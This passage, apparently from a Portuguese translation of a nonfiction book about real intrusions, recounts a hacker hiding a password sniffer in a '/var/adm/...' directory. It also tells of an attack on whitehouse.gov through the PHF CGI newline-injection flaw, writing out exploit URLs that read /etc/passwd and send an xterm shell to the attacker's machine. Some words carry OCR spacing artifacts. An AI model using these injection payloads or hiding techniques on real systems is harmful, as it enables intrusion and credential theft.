Capítulo 2 Quando os terroristas ligam Depois de ganhar root, ne0h começou a interceptar senhas e e-mails instalando um programa sniffer, que age como um grampo de computador Qualquer tráfego que esteja sendo enviado pelo fio é captado secretamente; em geral o hacker manda os dados a serem armazenados num local onde é improvável que sejam notados. Para esconder o sniffer, diz ne0h, ele criou um diretório com um nome que era simplesmente um espaço representado por três pontos; a trajetória real que ele usou era "/var/adm/...". Depois de uma breve inspeção, um administrador de sistema poderia supervisionar esse item inócuo. Essa técnica de esconder o programa sniffer, embora efetiva em muitas situações, é bem simples; existem métodos muito mais sofisticados para encobrir os rastros de um hacker numa situação como essa. Antes de descobrir se ele seria capaz de penetrar ainda mais na rede Lockheed Martin para obter informações confidenciais da empresa, ne0h voltou sua atenção para outra tarefa. Os arquivos sensíveis de Lockheed Martin continuaram seguros. Para o hack da Casa Branca, Zyklon diz que ele inicialmente usou um programa chamado Scanner CGI (Common Gateway Interface), que escaneia o sistema-alvo para vulnerabilidades do CGI. Ele descobriu que o site Web era suscetível a ataque usando o PHF exploit, que tira vantagem de um erro do programador cometido pelo projetista do script do PHF (lista telefônica). O PHF é um arquivo de interface baseado em formulário que aceita um nome como entrada e procura informações como nome e endereço no servidor. O script chamava uma função escape_shell_cmd(), que deveria sanitizar a entrada para qualquer caractere especial. Mas o programador tinha deixado um caractere de fora de sua lista, o newline. Um bom atacante poderia ti r a r vantagem dessa falha fornecendo entrada no formulário que incluía a versão criptografada (0X0a) do caractere newline. Isso engana o script, fazendo-o executar qualquer comando que o atacante escolha. Zyklon digitou este URL em seu browser: http://www.whitehouse.gov/cgi-b in /p h f? O a li a s = x % 0 a / b i n / cat%20/etc/passwd Com isso, conseguiu exibir o arquivo da senha para whitehouse.gov. Mas ele queria ganhar pleno controle do servidor da Casa Branca na rede- Sabia que era bastante provável que as portas do servidor X fossem bloqueadas pelo firewall, o que o impediria de se conectar a qualquer um daqueles serviços no whitehouse.gov. Então, em vez disso, explorou novamente o buraco PHF digitando
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/ X11R6/bin/xterm%20-ut%20-display%20zyk1ons.ip.address:0.0 Isso fez com que um termo x fosse enviado do servidor da Casa Branca para um computador sob o controle dele, dirigindo um servidor X. Ou seja, em vez de se conectar à whitehouse.gov, com efeito ele estava comandando o sistema da Casa Branca para conectar-se a ele. (Isso só é possível quando o firewall permite conexões externas, O que aparentemente é o caso aqui.)